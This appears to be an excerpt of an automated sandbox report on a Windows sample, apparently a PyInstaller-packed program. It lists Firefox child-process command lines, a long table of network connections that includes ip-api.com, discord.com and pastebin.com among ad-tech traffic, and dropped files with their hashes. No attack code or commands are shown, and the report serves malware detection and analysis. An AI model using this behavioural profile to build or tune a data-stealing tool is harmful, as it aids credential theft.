"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.8.1631979949\227202197" -childID 6 -isForBrowser -prefsHandle 5916 -prefMapHandle 5912 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a39d7a4-98ac-4e8e-9cb2-225bfe987d5f} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5924 2043be2d558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.9.912800860\2035668290" -childID 7 -isForBrowser -prefsHandle 10004 -prefMapHandle 10056 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19b35418-c287-4446-a3d4-d39416f16766} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 4860 2043de55958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.10.1431782564\1272254683" -childID 8 -isForBrowser -prefsHandle 9988 -prefMapHandle 9992 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7cba82e-2ba5-452d-9612-286980f1ea03} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 9980 2043de56258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.11.37375899\275871677" -childID 9 -isForBrowser -prefsHandle 9744 -prefMapHandle 9740 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e029b9f-ab40-42a2-88c1-239e7883304b} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 9592 2043df18858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.12.1912395626\1838205560" -childID 10 -isForBrowser -prefsHandle 9448 -prefMapHandle 9444 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b94b8d18-b5f4-49bf-9698-646c8a2c7788} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 9460 2043df15558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.13.323643159\1878532" -childID 11 -isForBrowser -prefsHandle 9396 -prefMapHandle 9392 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08df8404-2674-4391-9bad-da96e58472ef} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 9608 2043db7f258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.14.940211301\1807040294" -childID 12 -isForBrowser -prefsHandle 9144 -prefMapHandle 9148 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dbcae252-4da9-4977-a64c-3747ac11ee2d} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 9136 2043a91f858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.15.56004043\1951153233" -childID 13 -isForBrowser -prefsHandle 8984 -prefMapHandle 8976 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32f3fdb4-233a-481a-bba8-ea92827eed51} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 8996 2043a921958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.16.153059500\587934032" -childID 14 -isForBrowser -prefsHandle 8800 -prefMapHandle 8796 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b490f80-6829-423a-b60c-6f25064d03e7} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 8812 2043a922858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.17.1395375548\817965282" -childID 15 -isForBrowser -prefsHandle 8508 -prefMapHandle 8504 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb598075-b8a7-4da5-b754-089c868cc982} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 8520 2043eddc458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.18.633255734\2098280710" -childID 16 -isForBrowser -prefsHandle 8184 -prefMapHandle 8168 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19912f2a-9e3b-48fd-98d7-56c42f53dc18} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 8144 2043f28d558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.19.1519957282\307534974" -childID 17 -isForBrowser -prefsHandle 8032 -prefMapHandle 8028 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac3c008c-7d23-424b-bf0c-cf945117fbba} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 8040 2043f176558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.20.158851460\400396987" -childID 18 -isForBrowser -prefsHandle 7840 -prefMapHandle 7836 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2221b79a-0288-45e2-9517-a724dfbebfbf} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7852 2043f28d858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.21.1087977969\1427423548" -childID 19 -isForBrowser -prefsHandle 5184 -prefMapHandle 5672 -prefsLen 27960 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e667ab0d-4c7c-438f-bd67-ada106789516} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7532 20432e0d258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.22.1407537576\1547823098" -childID 20 -isForBrowser -prefsHandle 7448 -prefMapHandle 8936 -prefsLen 28039 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27ff48e4-6a6d-4c8e-86f5-451db7ea75f8} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7456 2043b227858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.23.202984230\616584407" -childID 21 -isForBrowser -prefsHandle 7384 -prefMapHandle 7500 -prefsLen 28039 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ae9b76d-1949-483c-8492-bf1ae27ed0da} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7400 2043b229058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.24.252673244\639056828" -childID 22 -isForBrowser -prefsHandle 7048 -prefMapHandle 7076 -prefsLen 28039 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32087b98-5c3f-481e-bd48-766f4b000ad3} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7072 20432e25458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.25.877541999\1579235465" -childID 23 -isForBrowser -prefsHandle 6984 -prefMapHandle 6776 -prefsLen 31299 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9280e93f-3f53-4ede-bc62-4670b55e36fc} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7004 20439364b58 tab
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-3iour.in | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| N/A | 127.0.0.1:50066 | | tcp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 52.33.96.36:443 | shavar.prod.mozaws.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.120.5.221:443 | prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | udp |
| N/A | 127.0.0.1:50072 | | tcp |
| US | 104.20.3.235:80 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 172.67.21.227:443 | dsp.vlitag.com | tcp |
| US | 172.67.21.227:443 | dsp.vlitag.com | udp |
| US | 172.67.21.227:443 | dsp.vlitag.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 104.22.59.199:443 | dsp.vlitag.com | tcp |
| US | 104.22.59.199:443 | dsp.vlitag.com | tcp |
| US | 104.22.59.199:443 | dsp.vlitag.com | tcp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | tcp |
| US | 104.22.59.199:443 | dsp.vlitag.com | udp |
| US | 104.22.59.199:443 | dsp.vlitag.com | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | udp |
| FR | 52.222.149.52:443 | d23sp3kzv1t6m5.cloudfront.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 18.245.194.122:443 | c.amazon-adsystem.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 18.245.194.122:443 | c.amazon-adsystem.com | tcp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | udp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | udp |
| FR | 52.84.174.75:443 | config.aps.amazon-adsystem.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | useast.quantumdex.io | udp |
| US | 8.8.8.8:53 | prebid-eu.creativecdn.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 172.67.75.241:443 | script.4dex.io | tcp |
| US | 8.8.8.8:53 | script.4dex.io | udp |
| US | 104.22.36.96:443 | useast.quantumdex.io | tcp |
| US | 104.22.36.96:443 | useast.quantumdex.io | tcp |
| DE | 18.157.128.118:443 | api.cmp.inmobi.com | tcp |
| US | 172.67.75.241:443 | script.4dex.io | tcp |
| US | 104.18.22.145:443 | cadmus.script.ac | tcp |
| US | 8.8.8.8:53 | 52.149.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.65.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.120.101.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.175.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.174.84.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.36.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.128.157.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cadmus.script.ac | udp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| NL | 185.184.8.90:443 | prebid-eu.creativecdn.com | tcp |
| DE | 37.252.171.21:443 | ib.adnxs.com | tcp |
| NL | 185.184.8.90:443 | prebid-eu.creativecdn.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 37.252.171.21:443 | ib.adnxs.com | tcp |
| US | 104.22.36.96:443 | sync.quantumdex.io | udp |
| IE | 52.214.238.79:443 | ap.lijit.com | tcp |
| IE | 52.214.238.79:443 | ap.lijit.com | tcp |
| BE | 23.55.97.75:443 | a.teads.tv | tcp |
| US | 151.101.65.108:443 | acdn.adnxs.com | tcp |
| IE | 63.34.134.140:443 | ce.lijit.com | tcp |
| DE | 168.119.72.236:443 | sync.richaudience.com | tcp |
| US | 172.67.42.201:443 | sync.quantumdex.io | tcp |
| US | 172.67.42.201:443 | sync.quantumdex.io | udp |
| US | 23.21.229.124:443 | ssp.disqus.com | tcp |
| FR | 18.164.52.25:443 | s.ad.smaato.net | tcp |
| US | 104.18.36.155:443 | ssum-sec.casalemedia.com | tcp |
| US | 34.230.93.105:443 | cs-server-s2s.yellowblue.io | tcp |
| NL | 188.42.191.196:443 | ads.betweendigital.com | tcp |
| GB | 2.21.188.239:443 | ads.pubmatic.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| DE | 51.75.86.98:443 | onetag-sys.com | tcp |
| DE | 51.75.86.98:443 | onetag-sys.com | tcp |
| NL | 77.245.57.72:443 | 1.cpm.ak-is2.net | tcp |
| NL | 77.245.57.72:443 | 1.cpm.ak-is2.net | tcp |
| NL | 77.245.57.72:443 | 1.cpm.ak-is2.net | tcp |
| NL | 77.245.57.72:443 | 1.cpm.ak-is2.net | tcp |
| US | 13.248.245.213:443 | eu-eb2.3lift.com | tcp |
| DE | 168.119.72.236:443 | sync.richaudience.com | tcp |
| US | 104.18.36.155:443 | ssum-sec.casalemedia.com | udp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| DE | 18.158.126.136:443 | match.sharethrough.com | tcp |
| DE | 51.75.86.98:443 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | 124.229.21.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.86.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.93.230.34.in-addr.arpa | udp |
| US | 34.213.18.242:443 | prod.tahoe-analytics.publishers.advertising.a2z.com | tcp |
| US | 34.213.18.242:443 | prod.tahoe-analytics.publishers.advertising.a2z.com | tcp |
| DE | 79.127.216.47:443 | id.a-mx.com | tcp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| FR | 99.86.95.185:443 | cdn.prod.uidapi.com | tcp |
| GB | 172.217.169.65:443 | 5771e6933759fd1eaed8d1719c6f0f3a.safeframe.googlesyndication.com | tcp |
| US | 34.102.146.192:443 | oa.openxcdn.net | udp |
| NL | 79.127.227.46:443 | id.a-mx.com | tcp |
| GB | 172.217.169.65:443 | 5771e6933759fd1eaed8d1719c6f0f3a.safeframe.googlesyndication.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 104.22.52.86:443 | cdn.id5-sync.com | tcp |
| FR | 52.222.169.25:443 | connectid.analytics.yahoo.com | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 104.18.35.167:443 | cdn-ima.33across.com | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| FR | 18.155.129.21:443 | tags.crwdcntrl.net | tcp |
| US | 34.120.107.143:443 | oajs.openx.net | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 141.95.98.64:443 | id5-sync.com | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| IE | 52.49.45.15:443 | bcp.crwdcntrl.net | tcp |
| US | 34.120.107.143:443 | oajs.openx.net | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| FR | 178.250.7.13:443 | dnacdn.net | tcp |
| FR | 178.250.7.13:443 | dnacdn.net | tcp |
| US | 8.8.8.8:53 | 192.146.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.95.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.227.127.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.35.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.70.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.107.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.169.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.52.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.129.155.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.98.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.45.49.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| FR | 185.235.86.26:443 | ag.gbc.criteo.com | tcp |
| NL | 185.235.87.137:443 | gbc4.nl3.eu.criteo.com | tcp |
| US | 34.98.64.218:443 | google-bidout-d.openx.net | tcp |
| US | 172.67.75.64:443 | adsystem.pocpoc.io | tcp |
| US | 34.98.64.218:443 | google-bidout-d.openx.net | udp |
| US | 172.67.75.64:443 | adsystem.pocpoc.io | tcp |
| US | 172.67.75.64:443 | adsystem.pocpoc.io | tcp |
| US | 13.107.246.64:443 | adsdk.microsoft.com | tcp |
| US | 172.67.75.64:443 | adsystem.pocpoc.io | udp |
| GB | 2.21.188.221:443 | acdn.adnxs-simple.com | tcp |
| US | 172.67.75.64:443 | adsystem.pocpoc.io | udp |
| DE | 141.101.120.10:443 | static.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | static.vliplatform.com | udp |
| US | 8.8.8.8:53 | 26.86.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.64.98.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.188.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | odb.outbrain.com | udp |
| US | 151.101.190.132:443 | odb.outbrain.com | tcp |
| US | 34.95.69.49:443 | i.clean.gg | tcp |
| US | 34.95.69.49:443 | i.clean.gg | tcp |
| BE | 23.41.178.83:443 | www.bing.com | tcp |
| US | 34.95.69.49:443 | i.clean.gg | udp |
| BE | 23.41.178.83:443 | www.bing.com | udp |
| GB | 2.21.190.8:443 | e15144.d.akamaiedge.net | tcp |
| GB | 2.21.189.145:443 | e10883.g.akamaiedge.net | tcp |
| GB | 2.21.189.145:443 | e10883.g.akamaiedge.net | tcp |
| US | 50.31.142.31:443 | log.outbrainimg.com | tcp |
| NL | 185.89.210.46:443 | ams3-ib.adnxs.com | tcp |
| US | 70.42.32.95:443 | mcdp-nydc1.outbrain.com | tcp |
| DE | 37.252.171.149:443 | fra1-ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | 145.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.142.31.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.32.42.70.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.171.252.37.in-addr.arpa | udp |
| US | 151.101.129.108:443 | cdn.adnxs.com | tcp |
| US | 151.101.129.108:443 | cdn.adnxs.com | tcp |
| DE | 37.252.171.21:443 | fra1-ib.adnxs.com | tcp |
| IE | 54.239.33.159:443 | aax-eu.amazon-adsystem.com | tcp |
| NL | 185.184.8.90:443 | ams.creativecdn.com | tcp |
| GB | 142.250.178.10:443 | ajax.googleapis.com | tcp |
| GB | 142.250.178.10:443 | ajax.googleapis.com | tcp |
| GB | 89.187.167.6:443 | statics.creativecdn.com | tcp |
| GB | 89.187.167.6:443 | statics.creativecdn.com | tcp |
| GB | 89.187.167.6:443 | statics.creativecdn.com | tcp |
| GB | 89.187.167.6:443 | statics.creativecdn.com | tcp |
| GB | 89.187.167.6:443 | statics.creativecdn.com | tcp |
| GB | 89.187.167.6:443 | statics.creativecdn.com | tcp |
| GB | 142.250.178.10:443 | ajax.googleapis.com | udp |
| GB | 89.187.167.6:443 | statics.creativecdn.com | udp |
| US | 104.26.7.132:443 | quantumsyndication.com | tcp |
| US | 8.8.8.8:53 | cdn.lijit.com | udp |
| US | 8.8.8.8:53 | lbs-us-east1.ads.betweendigital.com | udp |
| US | 8.8.8.8:53 | cache.betweendigital.com | udp |
| FR | 52.84.174.128:443 | d27c6x3b3mm9so.cloudfront.net | tcp |
| US | 8.8.8.8:53 | d27c6x3b3mm9so.cloudfront.net | udp |
| US | 8.8.8.8:53 | e213908.b.akamaiedge.net | udp |
| DE | 151.236.71.142:443 | cache.betweendigital.com | tcp |
| US | 104.26.7.132:443 | quantumsyndication.com | udp |
| NL | 23.62.61.194:443 | e213908.b.akamaiedge.net | tcp |
| US | 96.46.186.59:443 | lbs-us-east1.ads.betweendigital.com | tcp |
| RU | 194.226.130.227:443 | www.tns-counter.ru | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.71.236.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.174.84.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.130.226.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.186.46.96.in-addr.arpa | udp |
| NL | 23.62.61.138:443 | aqfer.lijit.com | tcp |
| IE | 54.220.24.43:443 | sync.sharethis.com | tcp |
| NL | 23.62.61.138:443 | aqfer.lijit.com | tcp |
| IE | 54.220.24.43:443 | sync.sharethis.com | tcp |
| DE | 18.184.216.10:443 | ps.eyeota.net | tcp |
| US | 8.8.8.8:53 | 10.216.184.18.in-addr.arpa | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| NL | 2.18.121.73:80 | a19.dscg10.akamai.net | tcp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | tcp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | udp |
| GB | 173.194.183.166:443 | r1.sn-aigl6ney.gvt1.com | tcp |
| GB | 173.194.183.166:443 | r1.sn-aigl6ney.gvt1.com | udp |
| DE | 37.252.171.21:443 | fra1-ib.adnxs.com | tcp |
| GB | 172.217.169.65:443 | 5771e6933759fd1eaed8d1719c6f0f3a.safeframe.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| BE | 23.41.178.83:443 | e86303.dscx.akamaiedge.net | udp |
| GB | 2.21.188.221:443 | e6115.g.akamaiedge.net | tcp |
| US | 172.67.75.64:443 | adsystem.pocpoc.io | udp |
| US | 172.67.75.64:443 | adsystem.pocpoc.io | udp |
| US | 50.31.142.31:443 | log.outbrainimg.com | tcp |
| US | 70.42.32.95:443 | mcdp-nydc1.outbrain.com | tcp |
| DE | 37.252.171.21:443 | fra1-ib.adnxs.com | tcp |
| GB | 142.250.178.10:443 | ajax.googleapis.com | udp |
| US | 50.31.142.31:443 | log.outbrainimg.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI19482\python311.dll
| MD5 | 1e76961ca11f929e4213fca8272d0194 |
| SHA1 | e52763b7ba970c3b14554065f8c2404112f53596 |
| SHA256 | 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0 |
| SHA512 | ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b |
C:\Users\Admin\AppData\Local\Temp\_MEI19482\VCRUNTIME140.dll
| MD5 | 870fea4e961e2fbd00110d3783e529be |
| SHA1 | a948e65c6f73d7da4ffde4e8533c098a00cc7311 |
| SHA256 | 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644 |
| SHA512 | 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88 |
memory/1744-25-0x00007FFD5D700000-0x00007FFD5DCEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI19482\base_library.zip
| MD5 | 2efeab81308c47666dfffc980b9fe559 |
| SHA1 | 8fbb7bbdb97e888220df45cc5732595961dbe067 |
| SHA256 | a20eeb4ba2069863d40e4feab2136ca5be183887b6368e32f1a12c780a5af1ad |
| SHA512 | 39b030931a7a5940edc40607dcc9da7ca1bf479e34ebf45a1623a67d38b98eb4337b047cc8261038d27ed9e9d6f2b120abbf140c6c90d866cdba0a4c810ac32c |
C:\Users\Admin\AppData\Local\Temp\_MEI19482\_ctypes.pyd
| MD5 | 7ecc651b0bcf9b93747a710d67f6c457 |
| SHA1 | ebb6dcd3998af9fff869184017f2106d7a9c18f3 |
| SHA256 | b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a |
